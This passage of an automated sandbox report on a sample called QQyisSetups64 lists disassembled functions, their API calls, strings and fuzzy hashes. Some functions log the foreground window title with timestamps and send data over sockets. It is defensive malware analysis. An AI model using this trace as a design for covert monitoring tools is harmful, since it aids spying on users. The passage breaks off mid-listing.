Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: ff8f0869f3e7de5a2537e9c50bf6993230bb5d0843f6bde3c1edc909d659f684
Instruction ID: b09c07930843b9e75320ebae1f73fd039b68c1eead1a31673372078f207881ef
Opcode Fuzzy Hash: ff8f0869f3e7de5a2537e9c50bf6993230bb5d0843f6bde3c1edc909d659f684
Instruction Fuzzy Hash: D051C076A04601DFC325EFA8D989B6AF7F5FF48714F108A2EE50A87740E735A414CB91

Function 0360BD5F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0360BD81
_wcsrchr.LIBCMT ref: 0360BD89
_memset.LIBCMT ref: 0360BDC0
_wcsrchr.LIBCMT ref: 0360BDC8
_memset.LIBCMT ref: 0360BE43
_memset.LIBCMT ref: 0360BE6F
_memset.LIBCMT ref: 0360BE8A
_memset.LIBCMT ref: 0360BF29

Strings

D, xrefs: 0360BF35

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _memset$_wcsrchr
String ID: D
API String ID: 170005318-2746444292
Opcode ID: f6fa0b72b56112bd3c35845102393e6f1842eb526f784eef978a12b58a365560
Instruction ID: 6b6761cdb3ac15f043e6ccf4188fdf819de252a054af0bd0502b3ea3173444d4
Opcode Fuzzy Hash: f6fa0b72b56112bd3c35845102393e6f1842eb526f784eef978a12b58a365560
Instruction Fuzzy Hash: BB51297594031C7ADB24EBA0CD86FEBB778DF14700F444599A609AB0C0EB709694CFA5

Function 0378E730 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74stringtimeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0378E751
GetForegroundWindow.USER32(?,771B23A0,00000000), ref: 0378E759
GetWindowTextW.USER32(00000000,037B16F0,00000800), ref: 0378E76F
_memset.LIBCMT ref: 0378E78D
lstrlenW.KERNEL32(037B16F0,?,?,?,?,771B23A0,00000000), ref: 0378E7AC
GetLocalTime.KERNEL32(?,?,?,?,?,771B23A0,00000000), ref: 0378E7BD
wsprintfW.USER32 ref: 0378E804

Part of subcall function 0378E6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0378E815,?,?,?,?,771B23A0,00000000), ref: 0378E6BD
Part of subcall function 0378E6B0: CreateFileW.KERNEL32(037B0D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0378E815,?,?,?,?,771B23A0,00000000), ref: 0378E6D7
Part of subcall function 0378E6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0378E6F2
Part of subcall function 0378E6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 0378E6FF
Part of subcall function 0378E6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 0378E70A
Part of subcall function 0378E6B0: CloseHandle.KERNEL32(00000000), ref: 0378E711
Part of subcall function 0378E6B0: ReleaseMutex.KERNEL32(00000000), ref: 0378E71E

_memset.LIBCMT ref: 0378E820

Strings

[, xrefs: 0378E7FE

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
String ID: [
API String ID: 2192163267-4056885943
Opcode ID: b27152c1a289bf68197c9b6d61b7b7e2fef44bff6cffcc086984e1bbef2bad76
Instruction ID: fd153200d39cba70930bbe731a1c52e9b0dd8e6c9742fa49ecd7692146cf4ea3
Opcode Fuzzy Hash: b27152c1a289bf68197c9b6d61b7b7e2fef44bff6cffcc086984e1bbef2bad76
Instruction Fuzzy Hash: B521E5B5A40218AAD760EF54DC05FBAB3BCFF44704F44C299F984A6181EE785985CFE0

Function 036156E1 Relevance: 15.3, APIs: 10, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 03615703

Part of subcall function 0361881A: __mtinitlocknum.LIBCMT ref: 03618830
Part of subcall function 0361881A: __amsg_exit.LIBCMT ref: 0361883C

____lc_codepage_func.LIBCMT ref: 0361574A

Part of subcall function 0361AAD7: __getptd.LIBCMT ref: 0361AAD7

__getenv_helper_nolock.LIBCMT ref: 0361576C
_free.LIBCMT ref: 036157A3
_strlen.LIBCMT ref: 036157AA
__malloc_crt.LIBCMT ref: 036157B1
_strlen.LIBCMT ref: 036157C7
_strcpy_s.LIBCMT ref: 036157D5
__invoke_watson.LIBCMT ref: 036157EA
_free.LIBCMT ref: 036157F9

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _free_strlen$____lc_codepage_func__amsg_exit__getenv_helper_nolock__getptd__invoke_watson__lock__malloc_crt__mtinitlocknum_strcpy_s
String ID:
API String ID: 2128035972-0
Opcode ID: b058308d4fdfef1940e42f11e5b45edf41e2775cf3bd2bfbd0d08efe9f8df519
Instruction ID: 441da171bbf46a66127307604a44163bfae596da7292226604a98f3594d32835
Opcode Fuzzy Hash: b058308d4fdfef1940e42f11e5b45edf41e2775cf3bd2bfbd0d08efe9f8df519
Instruction Fuzzy Hash: 5691E475C013999FDB11DFA9CD819ADFBB9FF86210B2C046EE641AB250D7308961CB15

Function 03783DE0 Relevance: 15.1, APIs: 10, Instructions: 117memorynetworkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,0378398D,?,00000000,000000FF,00000000), ref: 03783E05
LeaveCriticalSection.KERNEL32(?,?,?,0378398D,?,00000000,000000FF,00000000), ref: 03783E50
send.WS2_32(?,000000FF,00000000,00000000), ref: 03783E6E
EnterCriticalSection.KERNEL32(?), ref: 03783E81
LeaveCriticalSection.KERNEL32(?), ref: 03783E94
HeapFree.KERNEL32(00000000,00000000,?,?,?,0378398D,?,00000000,000000FF,00000000), ref: 03783EBC
WSAGetLastError.WS2_32(?,?,0378398D,?,00000000,000000FF,00000000), ref: 03783EC7
EnterCriticalSection.KERNEL32(?,?,?,0378398D,?,00000000,000000FF,00000000), ref: 03783EDB
LeaveCriticalSection.KERNEL32(?), ref: 03783F14
HeapFree.KERNEL32(00000000,00000000,?), ref: 03783F51

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
String ID:
API String ID: 1701177279-0
Opcode ID: f0cf0706f7ff91ffdeaf7274a29f935a457f3346436b052ac118854417830203
Instruction ID: 5f1a9accc9ded44e81b851da3542880e3a83b5d722a5d29619654f465b369c4e
Opcode Fuzzy Hash: f0cf0706f7ff91ffdeaf7274a29f935a457f3346436b052ac118854417830203
Instruction Fuzzy Hash: 15412679144A049FE724EF78D888AA7B7F8EB49700F45896EE86ECB245D735A4018B60

Function 03784F30 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 03784F63
EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 03784F78
WSASetLastError.WS2_32(00002746), ref: 03784F8A
LeaveCriticalSection.KERNEL32(000002FF), ref: 03784F91
timeGetTime.WINMM ref: 03784FBF
timeGetTime.WINMM ref: 03784FE7
SetEvent.KERNEL32(?), ref: 03785025
InterlockedExchange.KERNEL32(?,00000001), ref: 03785031
LeaveCriticalSection.KERNEL32(000002FF), ref: 03785038
LeaveCriticalSection.KERNEL32(000002FF), ref: 0378504B

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
String ID:
API String ID: 1979691958-0
Opcode ID: 8e9c8d8587803b05d55edbd89a5c9b284922feaadee38215a6d626f2f30674f0
Instruction ID: 1afbb6227d3cd3aa340b0e88f7188c99dc97813590618d5ad2b83428baf7402c
Opcode Fuzzy Hash: 8e9c8d8587803b05d55edbd89a5c9b284922feaadee38215a6d626f2f30674f0
Instruction Fuzzy Hash: D341D531640705DFD720FF7AD548A6AB7E9FB88314F08899DE84AC7641E775E4418B40

Function 02C84F10 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 02C84F43
EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 02C84F58
WSASetLastError.WS2_32(00002746), ref: 02C84F6A
LeaveCriticalSection.KERNEL32(000002FF), ref: 02C84F71
timeGetTime.WINMM ref: 02C84F9F
timeGetTime.WINMM ref: 02C84FC7
SetEvent.KERNEL32(?), ref: 02C85005
InterlockedExchange.KERNEL32(?,00000001), ref: 02C85011
LeaveCriticalSection.KERNEL32(000002FF), ref: 02C85018
LeaveCriticalSection.KERNEL32(000002FF), ref: 02C8502B

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
String ID:
API String ID: 1979691958-0
Opcode ID: d476bfc1fe01da997c65fbe6585ddc64bdf135235d639ca9b9220a2554bc33b1
Instruction ID: f612f22247ee44687cff2b522c08026f0c055189f9b350ec2a562769ba693d8c
Opcode Fuzzy Hash: d476bfc1fe01da997c65fbe6585ddc64bdf135235d639ca9b9220a2554bc33b1
Instruction Fuzzy Hash: 16411531A002019FD730EF68D948B6AB7F9FF88318F40CA5DE54ACB241E776E9508B81

Function 0378C270 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98filestringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0378C2AE
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0378C2CC
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0378C309
CloseHandle.KERNEL32(00000000), ref: 0378C314
lstrlenW.KERNEL32(?), ref: 0378C321
wsprintfW.USER32 ref: 0378C345

Strings

%s %s, xrefs: 0378C33F

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
String ID: %s %s
API String ID: 1326869720-2939940506
Opcode ID: 5be25f5cf802eeb7b6f9549197d8e07fc09f792b8d85bbd2518d86705b4e863d
Instruction ID: 32bd9dbe9f39c41be996a87730f99ae294a0186ad0ea5dcde7c98a6f7f7702b6
Opcode Fuzzy Hash: 5be25f5cf802eeb7b6f9549197d8e07fc09f792b8d85bbd2518d86705b4e863d
Instruction Fuzzy Hash: 5D31A432680618AFDB24EB64DC85FEFB378EB49311F40469AFA05A61C1DA345A44CFA1

Function 0378C980 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88processstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0378C98D
_wcsrchr.LIBCMT ref: 0378C9C7

Part of subcall function 03787C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 03787CC3
Part of subcall function 03787C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03787CD7
Part of subcall function 03787C80: FreeLibrary.KERNEL32(00000000), ref: 03787CF7

GetFileAttributesW.KERNEL32(-00000002), ref: 0378C9E6
GetLastError.KERNEL32 ref: 0378C9F1
_memset.LIBCMT ref: 0378CA04
CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0378CA31

Strings

WinSta0\Default, xrefs: 0378CA2A
D, xrefs: 0378CA23

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
String ID: D$WinSta0\Default
API String ID: 174883095-1101385590
Opcode ID: e6f9eb0fab6cfb8bd2d11a254deb9c9e8556061e8f2ae0e09de9249f89460f4c
Instruction ID: 71174b8d05d37a5870b373bb65adefdc22d1dd6904a535ac4a313b9f248dc8e3
Opcode Fuzzy Hash: e6f9eb0fab6cfb8bd2d11a254deb9c9e8556061e8f2ae0e09de9249f89460f4c
Instruction Fuzzy Hash: E811EEB7A4020867D725F7A4AC89FFFF76C9B85620F044126FA05EE284D635950586B2

Function 03788159 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,A:\), ref: 03788166
lstrcmpiW.KERNEL32(?,B:\), ref: 03788176
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037881A6
lstrlenW.KERNEL32(?), ref: 037881B7
__wcsnicmp.LIBCMT ref: 037881CE
lstrcpyW.KERNEL32(00000AD4,?), ref: 03788204
lstrcpyW.KERNEL32(?,?), ref: 03788228
lstrcatW.KERNEL32(?,00000000), ref: 03788233

Strings

A:\, xrefs: 03788160
B:\, xrefs: 03788170

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
String ID: A:\$B:\
API String ID: 4249875308-1009255891
Opcode ID: fe8088caf2f67db320404901228d8574947eff5893dc2fa2a5eb8e9e326a2eb7
Instruction ID: ddc098736af79e5cfc06a0319f4541accb98f9e9d6b5aeb9b0d00db8b26ed498
Opcode Fuzzy Hash: fe8088caf2f67db320404901228d8574947eff5893dc2fa2a5eb8e9e326a2eb7
Instruction Fuzzy Hash: 50119072A40218EBDB24EFA0DD44BEEB378EF84310F448498DE09B3141EB74EA05CB95

Function 03604DEF Relevance: 13.9, APIs: 9, Instructions: 440COMMON

Download Yara Rule

APIs

Part of subcall function 0360F0C6: _malloc.LIBCMT ref: 0360F0E0

_memset.LIBCMT ref: 03604E2B
_memset.LIBCMT ref: 03604E44
_memset.LIBCMT ref: 03604E54
_strcat_s.LIBCMT ref: 03604E97
_strcat_s.LIBCMT ref: 03604EB0
_strcat_s.LIBCMT ref: 03604EEC
_strcat_s.LIBCMT ref: 03604F05
__time64.LIBCMT ref: 036052B7
__localtime64.LIBCMT ref: 036052EE

Part of subcall function 03607AAF: __wcsnicmp.LIBCMT ref: 03607B8D

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _strcat_s$_memset$__localtime64__time64__wcsnicmp_malloc
String ID:
API String ID: 3592133475-0
Opcode ID: 9612d8c1e5366324d8b9188000d87f817137c3975bf1db378519ae119bbab18c
Instruction ID: c151847f92ad51ce4f8bd4aab095153610a7a2e9cf6cdb6e9db82f3b3157cbd4
Opcode Fuzzy Hash: 9612d8c1e5366324d8b9188000d87f817137c3975bf1db378519ae119bbab18c
Instruction Fuzzy Hash: 70F1A4B5900304ABD724DBA4CC85FEB77B8EF44300F44459CE71AAB281EB71AA55CF59

Function 036156BF Relevance: 13.7, APIs: 9, Instructions: 205COMMON

Download Yara Rule

APIs

____lc_codepage_func.LIBCMT ref: 0361574A
__getenv_helper_nolock.LIBCMT ref: 0361576C
_free.LIBCMT ref: 036157A3
_strlen.LIBCMT ref: 036157AA
__malloc_crt.LIBCMT ref: 036157B1
_strlen.LIBCMT ref: 036157C7
_strcpy_s.LIBCMT ref: 036157D5
__invoke_watson.LIBCMT ref: 036157EA
_free.LIBCMT ref: 036157F9

Memory Dump Source

Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd

Similarity

API ID: _free_strlen$____lc_codepage_func__getenv_helper_nolock__invoke_watson__malloc_crt_strcpy_s
String ID:
API String ID: 2056778627-0
Opcode ID: fb94a165544a799f799d92d1cfaadda03cf0e03ff00a903cef25901c42debaeb
Instruction ID: f38dc8e134301dfb5caf2c1500b3e27663eac22ae4e6eea3dd99d8cece543983
Opcode Fuzzy Hash: fb94a165544a799f799d92d1cfaadda03cf0e03ff00a903cef25901c42debaeb
Instruction Fuzzy Hash: 9061FA768013599FEB51EF65CD819ADFBF9EF86310B2C402EE601EF260E77188618B14

Function 03789730 Relevance: 13.7, APIs: 9, Instructions: 195timeCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,453DC9E3,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E,00000000), ref: 03789773
InitializeCriticalSectionAndSpinCount.KERNEL32(0378E1AE,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 03789812
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 03789850
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 03789875
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 0378989A

Part of subcall function 03781280: __CxxThrowException@8.LIBCMT ref: 03781290
Part of subcall function 03781280: DeleteCriticalSection.KERNEL32(00000000,0378D3E6,037A6624,?,?,0378D3E6,?,?,?,?,037A5A40,00000000), ref: 037812A1

Part of subcall function 0378CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0378E076,00000000,453DC9E3,0378E04E,771B2F60,00000000,?,0378E226,037A110B,000000FF,?,0378994A,0378E226), ref: 0378CE67
Part of subcall function 0378CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0378E08E,00000000,?,0378E226,037A110B,000000FF,?,0378994A,0378E226,?,?,?,00000000,037A125B,000000FF), ref: 0378CE83

InterlockedExchange.KERNEL32(0378E066,00000000), ref: 037899A0
timeGetTime.WINMM(?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 037899A6
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 037899B4
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 037899BD

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
String ID:
API String ID: 1400036169-0
Opcode ID: 99db6d04431aa650c87967c4b166e6056bf0ee47af1b6f24ff48445c9cc00499
Instruction ID: 97ddfd6cc618155af7442f4c49968bf6ea5c1315d4e9ae72e1a792394307175b
Opcode Fuzzy Hash: 99db6d04431aa650c87967c4b166e6056bf0ee47af1b6f24ff48445c9cc00499
Instruction Fuzzy Hash: EC81E7B0A41A46BFE344DF7AC88479AFBA8FB09314F50862ED12CD7640D775A964CF90

Function 03783500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 03783660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03783667
Part of subcall function 03783660: _free.LIBCMT ref: 0378369C
Part of subcall function 03783660: _malloc.LIBCMT ref: 037836D7
Part of subcall function 03783660: _memset.LIBCMT ref: 037836E5

InterlockedIncrement.KERNEL32(037B1F0C), ref: 03783565
InterlockedIncrement.KERNEL32(037B1F0C), ref: 03783573
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0378359A
setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 037835B3
ResetEvent.KERNEL32(?,?,?,037B1F0C), ref: 037835EE
SetLastError.KERNEL32(00000000), ref: 03783621
GetLastError.KERNEL32 ref: 03783639

Part of subcall function 03783F60: GetCurrentThreadId.KERNEL32 ref: 03783F65
Part of subcall function 03783F60: send.WS2_32(?,037A49C0,00000010,00000000), ref: 03783FC6
Part of subcall function 03783F60: SetEvent.KERNEL32(?), ref: 03783FE9
Part of subcall function 03783F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03783FF5
Part of subcall function 03783F60: WSACloseEvent.WS2_32(?), ref: 03784003
Part of subcall function 03783F60: shutdown.WS2_32(?,00000001), ref: 0378401B
Part of subcall function 03783F60: closesocket.WS2_32(?), ref: 03784025

SetLastError.KERNEL32(00000000), ref: 03783649

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
String ID:
API String ID: 127459856-0
Opcode ID: a9fc5116873563a568a026c2c25527be35476a2732e871f69d53a9a6c80ca671
Instruction ID: caf9745e8fa5ba4b1bc2678dcb7446160bd783250d2e445b99767e3df538712a
Opcode Fuzzy Hash: a9fc5116873563a568a026c2c25527be35476a2732e871f69d53a9a6c80ca671
Instruction Fuzzy Hash: 20419FB9640704AFE360EF6DDC81B6AB7F8FB88B11F50482EE646D7680D7B4E4048B50

Function 02C83500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 02C83660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02C83667
Part of subcall function 02C83660: _free.LIBCMT ref: 02C8369C
Part of subcall function 02C83660: _malloc.LIBCMT ref: 02C836D7
Part of subcall function 02C83660: _memset.LIBCMT ref: 02C836E5

InterlockedIncrement.KERNEL32(02C9D990), ref: 02C83565
InterlockedIncrement.KERNEL32(02C9D990), ref: 02C83573
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 02C8359A
setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 02C835B3
ResetEvent.KERNEL32(?,?,?,02C9D990), ref: 02C835EE
SetLastError.KERNEL32(00000000), ref: 02C83621
GetLastError.KERNEL32 ref: 02C83639

Part of subcall function 02C83F60: GetCurrentThreadId.KERNEL32 ref: 02C83F65
Part of subcall function 02C83F60: send.WS2_32(?,02C97440,00000010,00000000), ref: 02C83FC6
Part of subcall function 02C83F60: SetEvent.KERNEL32(?), ref: 02C83FE9
Part of subcall function 02C83F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C83FF5
Part of subcall function 02C83F60: WSACloseEvent.WS2_32(?), ref: 02C84003
Part of subcall function 02C83F60: shutdown.WS2_32(?,00000001), ref: 02C8401B
Part of subcall function 02C83F60: closesocket.WS2_32(?), ref: 02C84025

SetLastError.KERNEL32(00000000), ref: 02C83649

Memory Dump Source

Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd

Similarity

API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
String ID:
API String ID: 127459856-0
Opcode ID: eadc4fbd268ba597120fd1ff915865f2421a18eb9c1357eb153ad86c2453eca5
Instruction ID: 325aaddaaba5435ceb01cf5c1604d9214d72a8cc8f4ea453855f4376967afd2c
Opcode Fuzzy Hash: eadc4fbd268ba597120fd1ff915865f2421a18eb9c1357eb153ad86c2453eca5
Instruction Fuzzy Hash: 6041CEB1A00704AFD360EF69DC84B6AB7E8FB48B04F50596EE646D7680D7B0E8048F90

Function 03784430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?), ref: 03784443
ResetEvent.KERNEL32(?), ref: 0378444C
timeGetTime.WINMM ref: 0378444E
InterlockedExchange.KERNEL32(?,00000000), ref: 0378445D
WaitForSingleObject.KERNEL32(?,00001770), ref: 037844AB
ResetEvent.KERNEL32(?), ref: 037844C8

Part of subcall function 03783F60: GetCurrentThreadId.KERNEL32 ref: 03783F65
Part of subcall function 03783F60: send.WS2_32(?,037A49C0,00000010,00000000), ref: 03783FC6
Part of subcall function 03783F60: SetEvent.KERNEL32(?), ref: 03783FE9
Part of subcall function 03783F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03783FF5
Part of subcall function 03783F60: WSACloseEvent.WS2_32(?), ref: 03784003
Part of subcall function 03783F60: shutdown.WS2_32(?,00000001), ref: 0378401B
Part of subcall function 03783F60: closesocket.WS2_32(?), ref: 03784025

ResetEvent.KERNEL32(?), ref: 037844DC

Memory Dump Source

Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true

Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd

Similarity

API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
String ID:
API String ID: 542259498-0
Opcode ID: 1f4e2d2aabdaf171a9f6113049dfe67c14067aaac83b31e220d86523ea43e781
Instruction ID: 5a8557ab74f6cea946b598c029638ffbd6da1dc4d90e024681b0e08de571939b
Opcode Fuzzy Hash: 1f4e2d2aabdaf171a9f6113049dfe67c14067aaac83b31e220d86523ea43e781
Instruction Fuzzy Hash: E3217376640B04ABC630FF79EC84B97B3E8EF89710F104A1EE58AC7640D675E401CBA1

Function 02C84430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?), ref: 02C84443
ResetEvent.KERNEL32(?), ref: 02C8444C
timeGetTime.WINMM ref: 02C8444E
